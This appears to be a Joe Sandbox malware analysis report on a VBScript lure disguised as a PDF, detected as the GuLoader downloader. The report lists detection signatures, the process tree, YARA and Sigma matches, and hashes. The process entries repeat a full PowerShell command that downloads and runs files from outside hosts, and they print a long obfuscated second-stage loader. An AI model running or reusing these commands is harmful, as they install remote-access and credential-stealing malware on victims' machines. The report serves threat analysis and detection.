Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
List of required items pdf.vbs

Overview

General Information

Sample name:List of required items pdf.vbs
Analysis ID:1571488
MD5:1fee8d135b538567e24faa39b34f0f29
SHA1:7fb4d867634326ceac236efdc53a254950ff7890
SHA256:9518df13e375c4e3926979ddda32a1a11b94eb928364f9b45f35970ac82ee6e2
Tags:185-236-228-92vbsuser-JAMESWT_MHT
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7160 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 2660 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tk4f2qxkb.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • WMIC.exe (PID: 3160 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 4260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $Reedmaker;Unchanneled (Multiplum 'I sPlTFoARhR Ht S-Rus nLSte .E yp A U.4');Unchanneled (Multiplum 'Fr$T GOvlGioP.bHyaSnLF.: HkNeIA.dHud AI.eEe SKo=Au(Mat ,EPoSimtFu-MoPTuATrtMah E Ho$ pB EM nf s DiP.OFoNFosNeA LStD,iEsar e)') ;Unchanneled (Multiplum ' V$SkgUdlKao LbAdAI.l o:HyRSpOT,mO B mEClSUn=B,$VogBalG,ORabbiaJolS :AnIMoo oDTeiP.dPrS ,+Fe+Ri%Ki$ SS CJMiUshSPrkS.eDeMtaiAsKNoKrueRiLAn. CCChoU.UDenStT') ;$Knysten=$Sjuskemikkel[$Rombes]}$Balletkorpsets=301384;$Afledtes=28316;Unchanneled (Multiplum 'Fo$Rhg oLMioMubnoaC,lAu: TaMoufrgBoUR sLitFos.eNDed AScg , V.= u pag Be,stBa-UnC,ooSkN Mt SELeNReT.e Pa$,ep aE NSuS ,i SOAsnO,s.baFrL BdSkEpaR');Unchanneled (Multiplum 'Sk$Drg.elJoo,ab taKol S:SeRDkigep PiE eJunRyiSlsSktBu A=Re l[ReS ,y ys MtLre Smhe.lnCGao an v Ce .rHjtNu]Te:Se:etFGarMaoKhm cB.la SsRee .6Un4faS GtaarSui OnTrg r(F $ A Ju UgThususSut HsD nAndAtaTug m)');Unchanneled (Multiplum 'Co$HaGsklFloInbDeaTrLSa:SiEPel ,eD kV T RFuo it eo.KIcN,uIAckE kHiES,rHi In=Mi S [ rSOtyM SOvtH eSnmSp.deTA eAnx ,t.f. E iNnaC roLudBlI,onIng.e] e:b :AgAFjSS C I KISk.BegKleS,t Ns KTPeRS I Sn RG b( x$ .R ,IMapMaiSteS NLeImaSDyTU )');Unchanneled (Multiplum ' .$ScgArlp,oToBO a hLGr:Opb PuT,zDiZ.ma,rRSydFo=Em$DyE el Te rK TR,R oOMaTTrEU.K.hN BISyK.lKSpEF r C. Ns uB BDis FTWurPrIFoNbiGFu( .$ FBR aGeL nLDie nTShK.oOCrRNepKrS VESutJ,sI ,,a$HaAUnf.eLSteluDC.tL ed.sE )');Unchanneled $Buzzard;" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • EXCEL.EXE (PID: 6028 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\bsxhli2ob.xlsx" MD5: 4A871771235598812032C822E6F68F19)
        • splwow64.exe (PID: 7700 cmdline: C:\Windows\splwow64.exe 8192 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • powershell.exe (PID: 6364 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $Reedmaker;Unchanneled (Multiplum 'I sPlTFoARhR Ht S-Rus nLSte .E yp A U.4');Unchanneled (Multiplum 'Fr$T GOvlGioP.bHyaSnLF.: HkNeIA.dHud AI.eEe SKo=Au(Mat ,EPoSimtFu-MoPTuATrtMah E Ho$ pB EM nf s DiP.OFoNFosNeA LStD,iEsar e)') ;Unchanneled (Multiplum ' V$SkgUdlKao LbAdAI.l o:HyRSpOT,mO B mEClSUn=B,$VogBalG,ORabbiaJolS :AnIMoo oDTeiP.dPrS ,+Fe+Ri%Ki$ SS CJMiUshSPrkS.eDeMtaiAsKNoKrueRiLAn. CCChoU.UDenStT') ;$Knysten=$Sjuskemikkel[$Rombes]}$Balletkorpsets=301384;$Afledtes=28316;Unchanneled (Multiplum 'Fo$Rhg oLMioMubnoaC,lAu: TaMoufrgBoUR sLitFos.eNDed AScg , V.= u pag Be,stBa-UnC,ooSkN Mt SELeNReT.e Pa$,ep aE NSuS ,i SOAsnO,s.baFrL BdSkEpaR');Unchanneled (Multiplum 'Sk$Drg.elJoo,ab taKol S:SeRDkigep PiE eJunRyiSlsSktBu A=Re l[ReS ,y ys MtLre Smhe.lnCGao an v Ce .rHjtNu]Te:Se:etFGarMaoKhm cB.la SsRee .6Un4faS GtaarSui OnTrg r(F $ A Ju UgThususSut HsD nAndAtaTug m)');Unchanneled (Multiplum 'Co$HaGsklFloInbDeaTrLSa:SiEPel ,eD kV T RFuo it eo.KIcN,uIAckE kHiES,rHi In=Mi S [ rSOtyM SOvtH eSnmSp.deTA eAnx ,t.f. E iNnaC roLudBlI,onIng.e] e:b :AgAFjSS C I KISk.BegKleS,t Ns KTPeRS I Sn RG b( x$ .R ,IMapMaiSteS NLeImaSDyTU )');Unchanneled (Multiplum ' .$ScgArlp,oToBO a hLGr:Opb PuT,zDiZ.ma,rRSydFo=Em$DyE el Te rK TR,R oOMaTTrEU.K.hN BISyK.lKSpEF r C. Ns uB BDis FTWurPrIFoNbiGFu( .$ FBR aGeL nLDie nTShK.oOCrRNepKrS VESutJ,sI ,,a$HaAUnf.eLSteluDC.tL ed.sE )');Unchanneled $Buzzard;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3984 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.2781375941.0000000005309000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      Process Memory Space: powershell.exe PID: 4352JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 4352INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x1c6c44:$b2: ::FromBase64String(
        • 0x24a7cf:$b2: ::FromBase64String(
        • 0x24a808:$b2: ::FromBase64String(
        • 0x24a842:$b2: ::FromBase64String(
        • 0x24a87d:$b2: ::FromBase64String(
        • 0x24a8b9:$b2: ::FromBase64String(
        • 0x24a8f6:$b2: ::FromBase64String(
        • 0x24a934:$b2: ::FromBase64String(
        • 0x24a973:$b2: ::FromBase64String(
        • 0x24a9b3:$b2: ::FromBase64String(
        • 0x24a9f4:$b2: ::FromBase64String(
        • 0x24aa36:$b2: ::FromBase64String(
        • 0x24aa79:$b2: ::FromBase64String(
        • 0x24aabd:$b2: ::FromBase64String(
        • 0x24ab02:$b2: ::FromBase64String(
        • 0x361c75:$b2: ::FromBase64String(
        • 0x4d1a4:$s1: -join
        • 0x5a279:$s1: -join
        • 0x5d64b:$s1: -join
        • 0x5dcfd:$s1: -join
        • 0x5f7ee:$s1: -join
        Process Memory Space: powershell.exe PID: 6364JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          amsi64_4352.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi32_6364.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xa2d4:$b2: ::FromBase64String(
            • 0x935f:$s1: -join
            • 0x2b0b:$s4: +=
            • 0x2bcd:$s4: +=
            • 0x6df4:$s4: +=
            • 0x8f11:$s4: +=
            • 0x91fb:$s4: +=
            • 0x9341:$s4: +=
            • 0x12b7e:$s4: +=
            • 0x12bfe:$s4: +=
            • 0x12cc4:$s4: +=
            • 0x12d44:$s4: +=
            • 0x12f1a:$s4: +=
            • 0x12f9e:$s4: +=
            • 0x9b77:$e4: Get-WmiObject
            • 0x9d66:$e4: Get-Process
            • 0x9dbe:$e4: Start-Process

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tk4f2qxkb.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tk4f2qxkb.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6880, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tk4f2qxkb.vbs" , ProcessId: 2660, ProcessName: wscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tk4f2qxkb.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tk4f2qxkb.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6880, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\tk4f2qxkb.vbs" , ProcessId: 2660, ProcessName: wscript.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7160, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', ProcessId: 6880, ProcessName: powershell.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs", ProcessId: 7160, ProcessName: wscript.exe
            Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6880, TargetFilename: C:\Users\Public\tk4f2qxkb.vbs
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 52.113.195.132, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6028, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49716
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6880, TargetFilename: C:\Users\Public\tk4f2qxkb.vbs
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7160, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', ProcessId: 6880, ProcessName: powershell.exe
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.8, DestinationIsIpv6: false, DestinationPort: 49716, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6028, Protocol: tcp, SourceIp: 52.113.195.132, SourceIsIpv6: false, SourcePort: 443
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', 